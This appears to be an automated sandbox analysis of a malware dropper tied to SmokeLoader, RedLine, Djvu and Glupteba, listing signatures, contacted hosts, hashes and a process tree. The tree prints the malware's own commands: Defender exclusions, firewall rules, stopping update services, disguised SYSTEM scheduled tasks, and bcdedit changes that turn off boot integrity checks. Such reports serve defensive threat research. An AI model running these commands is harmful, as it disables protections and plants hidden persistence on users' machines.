Analysis Overview
SHA256
92e52d4a2fcf95b0dd487e49bacfac77ad241f4744f2c6edf670686553c3dec2
Threat Level: Known bad
The file 0x0006000000023234-4438.dat was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
RedLine payload
Detected Djvu ransomware
Glupteba
Smokeloader family
Djvu Ransomware
RedLine
Glupteba payload
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Stops running service(s)
Downloads MZ/PE file
Modifies Windows Firewall
Deletes itself
Executes dropped EXE
Themida packer
Modifies file permissions
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-11 10:55
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-11 10:55
Reported
2023-12-11 10:57
Platform
win7-20231130-en
Max time kernel
30s
Max time network
105s
Command Line
Signatures
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe
"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\F623.exe
C:\Users\Admin\AppData\Local\Temp\F623.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp" /SL5="$B0118,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\FEEA.exe
C:\Users\Admin\AppData\Local\Temp\FEEA.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211105617.log C:\Windows\Logs\CBS\CbsPersist_20231211105617.cab
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\5FFE.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\625F.bat" "
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\taskeng.exe
taskeng.exe {7F50F906-4264-4AA5-A52C-2A3365A7527B} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\88AD.exe
C:\Users\Admin\AppData\Local\Temp\88AD.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\A801.exe
"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\338D.exe
C:\Users\Admin\AppData\Local\Temp\338D.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
Network
| Country | Destination | Domain | Proto |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| RU | 185.172.128.19:80 | 185.172.128.19 | tcp |
| RU | 77.105.132.87:6731 | tcp | |
| RU | 77.105.132.87:6731 | tcp | |
| MD | 176.123.7.190:32927 | tcp | |
| US | 20.150.70.36:443 | tcp | |
| RU | 77.105.132.87:6731 | tcp | |
| RU | 212.193.52.24:80 | tcp | |
| RU | 212.193.52.24:80 | tcp | |
| RU | 212.193.52.24:80 | host-host-file8.com | tcp |
| RU | 212.193.52.24:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | edarululoom.com | udp |
| US | 172.67.167.33:443 | edarululoom.com | tcp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| MX | 187.211.38.89:80 | tcp |
Files
memory/2972-0-0x0000000000400000-0x000000000040B000-memory.dmp
memory/2972-2-0x0000000000400000-0x000000000040B000-memory.dmp
memory/1388-1-0x0000000002EA0000-0x0000000002EB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\626B.exe
| MD5 | 088aafcffe55242bb9ce1134285978e8 |
| SHA1 | 520bc5ae4ca00c53bd533f653a93c1747747449c |
| SHA256 | 56bd2da50e5cdd6ab826eb419c478c7ed1f28673f0e469be916dd86d96d5aebb |
| SHA512 | 8aef2d2787625aea4663e04b7f2e281f48e7aebab8ad2afa4ac1746550a15a2885d7b32240d28ca9eade770d097062f3c0ffe0d2532d3af9c9465dc4299bf5dd |
memory/2564-12-0x0000000000080000-0x00000000000BC000-memory.dmp
memory/2564-17-0x0000000074EA0000-0x000000007558E000-memory.dmp
memory/2564-18-0x0000000004D40000-0x0000000004D80000-memory.dmp
memory/2564-20-0x0000000074EA0000-0x000000007558E000-memory.dmp
memory/2564-21-0x0000000004D40000-0x0000000004D80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F623.exe
| MD5 | 8764eade6c88fe85e7e18f0b2fc4241f |
| SHA1 | a68d6826b4d18c35e1cdb7583b2d20fd8f2243b6 |
| SHA256 | 65ba8b3a5e075135aacfb5d9625b12657b76f65b0e9cb2690ec3a409e459bdd3 |
| SHA512 | d5e5058f295a280a5e01f042e59e60b71e72819227a204de1d6608ad494cd531989f6701a50ff7e426949f16124134b27fa5edf435a9f8f5afb6ccdb02b97b52 |
C:\Users\Admin\AppData\Local\Temp\F623.exe
| MD5 | 8771ccd19b6744e00046c956db08b05e |
| SHA1 | 9a0268fd4a588f451ee4975a5556314311951aca |
| SHA256 | 61096aaa9339d3e8a773e4085a7e0f7955512c9fc146bc637aa9123adf7ed7be |
| SHA512 | 21d9cbaa5cb48c5f9b7ca628a6e53e8c5e36a77bd67eef7cc69022cfca8e8f76d52bda92643be85dd88c2ba665a9c98bbb24aff05662b5e9ac226e4bd0974163 |
memory/2472-28-0x0000000000B30000-0x0000000001FE6000-memory.dmp
memory/2472-27-0x0000000074EA0000-0x000000007558E000-memory.dmp
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 8622aabc7b40bf59c971d220ade39f31 |
| SHA1 | 5d2bc38c5423c2deffd61682c5ec0aa39aa9702e |
| SHA256 | b8fb049ff16ba93fbc43e55abc51765df17377c953acaeec8e2edff2c320c67d |
| SHA512 | f852e60bf99e23b644de27634e639c92cbf877c5214bb89fb47e23a02598a6ea0d0759f279b99bf2ac3b5ec12c6cb67d21c406466243c509d446ea5b7ce0dcfe |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | a56e5e57c1efd20005e7c23542ddf2c5 |
| SHA1 | 355c4dbe40ea7f636fbc15db814dfdbec6ad055e |
| SHA256 | a35232ded080e84988432be3ca1552dfd8b4278f531fbad6f7bb1824922c9d38 |
| SHA512 | fb5609f4f4338cbfd6a3067daeaa934ae16a17c12ff22eb1beea7c1a377214918b58e75596fc7e1cacef887917037217f2a53c04d825eb79cfc85494510320a7 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | ccd86f33fa8dcdd61267a0e7ce488570 |
| SHA1 | 68aecaccc93039fbc95241af33f624a810569d8e |
| SHA256 | b77105ac220add2ef8d3fc1180fdcf26bb0f14ff3e55b9f02dfe21f6370333ea |
| SHA512 | 50a30484efa925cd57ca3bcfcbf1bd9371f39b03fe2b5239797e52e46667935e1b1931d7a349ab2b9bbeb3eddae1cbacbce951677feb63d77b856d0ffb1ee6cb |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 80c2bef60061ba7522aa6a6aa8c46a31 |
| SHA1 | 54291e88265d93a21fe18f71309c1ec60b3cde07 |
| SHA256 | 64178454507ef6e0a35d577e6297c04b7ac72e980cd7e74d6cde5d06b056a8e5 |
| SHA512 | 17f5a9779bd7e08cc66fb33351ce76e75b9b73257f2d838968fba333b48befb453fea075d8e954e1fde01249493a7c7b540d4b9cf749e350a24f0be4254353b3 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 0218d2053782ccd3c0f1c60d3d0a9a86 |
| SHA1 | 18ca669440e1eac03b8ef78eed9c171bced7ea82 |
| SHA256 | 72b161014fcde37aaf9fc524284ef550ab6f3217a38297ac1e4422be9f3edd33 |
| SHA512 | 6d61edb4a745c607a55ea6f41233cbf885c45abe2fe7dbdd6bd794defa137e19b4e0c157bab9d7b15d2685bdda7b033593e5958a9440df1be86cb8d6e6d5c52f |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | d15b341b65c328ef620fc2bce25f21ea |
| SHA1 | 26b1ae8e8e36e1e31f8c05123c168c4788f3dfdf |
| SHA256 | afa7bf8140f406660e55171bb0ae29e31de73c5336f318728d9dcad524cd81e9 |
| SHA512 | b6b331b65c5d0027a4f985628c5c42ccaa405d39ad4898282475acc41ebacdd911ecb02e2b246e3bcfc3f83032b33e1c3a4fa53f018b08f7e34accbfaccecfa2 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 930856cfdda9b861c82aad09da078263 |
| SHA1 | c026fcfcb6a63233e1890761fd8ee7535ad87a5d |
| SHA256 | d6475e097d14498309aa334d1eeac1fff57ac7e9fc10fbea80e31000ef8fde36 |
| SHA512 | 013d6b8743ab1cfd602bd0aeacca4bdabf50580c3a3504e60b9aaf0fded61b8d8e4ca3fd18e6178c6f580c5c29e8b47f7248c29adb0e82444b71418b55870f6b |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 4e7185c04ead443201ece07c0a704431 |
| SHA1 | 86323695d1ead193134e84cc8a4c26601d21b835 |
| SHA256 | 88f14bf3e51acc0d00c4a1d7e94b2b19637e57b088617d9e1a29c74cea89cb85 |
| SHA512 | ef2e16df8cf4fac5d8a8233a03ad05ad803245bcedf704c53c0fecd84fa025b3c1c7e7094d8f608ada486ecf9ac5822e19130f177a61780d41e9c89ac812a7ee |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | b4fbf829421d660ba7d5b8d9075784df |
| SHA1 | d59f13ca93eac546fde451048a6586c979f17aa9 |
| SHA256 | 1a5fcbb4bdbbeadcdf9b6503287e6ac4dc040ea53bee86d2a15be1444e40fa96 |
| SHA512 | 494f59fdd6088e76d0c9eb8dc17e4f9391dccb6cd6786863b2415ed48575424db36723520a6eea81a7b838ba3cf6fcc839ce3d62e0f54d7fd8dbbbb532c2add3 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 4fe5af04ace0d03a043bedcd25dc541a |
| SHA1 | bcab32fc3444f2130dcbebb36180c0ef5c8aad0c |
| SHA256 | 40dd5b782a4a4d82097294b2b67a81900093195198e0880472b9023debbacf41 |
| SHA512 | a21e69ebcc1af43a7a5d669867855192ffba1c1839bb55036c5e1387061fd597c5d20f86e7e40d783cd201e568e83eb71cc2afe43bedb015c840ecbe6e7329c4 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 920a55e2510f6569c69067f907364183 |
| SHA1 | 5d51d14915ea7abd25af7b8106207dc9f08c51bf |
| SHA256 | 0b27b42125d515a678a8fb79359baaa559a1960ae601273c12a8888c70ea01ee |
| SHA512 | 72ea6edc8138b269006e374b363a437d99ba79c63ede7547f4e6d09501b3034b32f0f54fe995379141baa5cb628a54d82b13f116e4023c6d6bd7f388c9bebc3c |
memory/3004-62-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 26940ab29f62546528674050d9a558fe |
| SHA1 | b3e4afc1bae6447e1b4d0b517fcc9b05c8552858 |
| SHA256 | 045d5a2d6ea09b0719120ba8141a5c554474bd6e7675f527271eb62c90d3de47 |
| SHA512 | d245446e66d68be6f8108d38c056b30af0274b307d7028a3144fabbcd9f72cb72ac27e45306b5d2bb177eb5fad2893196c6fc02be7fbf54b0c72a21cddace086 |
\Users\Admin\AppData\Local\Temp\Broom.exe
| MD5 | 7d28225ff55f909ed3a56d7d193028a9 |
| SHA1 | 9ce6d62ecc01489c4179265ef19bb4aac80c0566 |
| SHA256 | 1408d85ca9d207ee0a752e4e421d7a470ae7c13c3407632516bfe4c575256be3 |
| SHA512 | d095e9cfa55f103fae6cceb0623b3fa060454cfa35979da66ec849b3d153ae38f517b594a62e4a12a97b7dfbd0dc193d6d0f22d53c325ec32590d4b7c425fb78 |
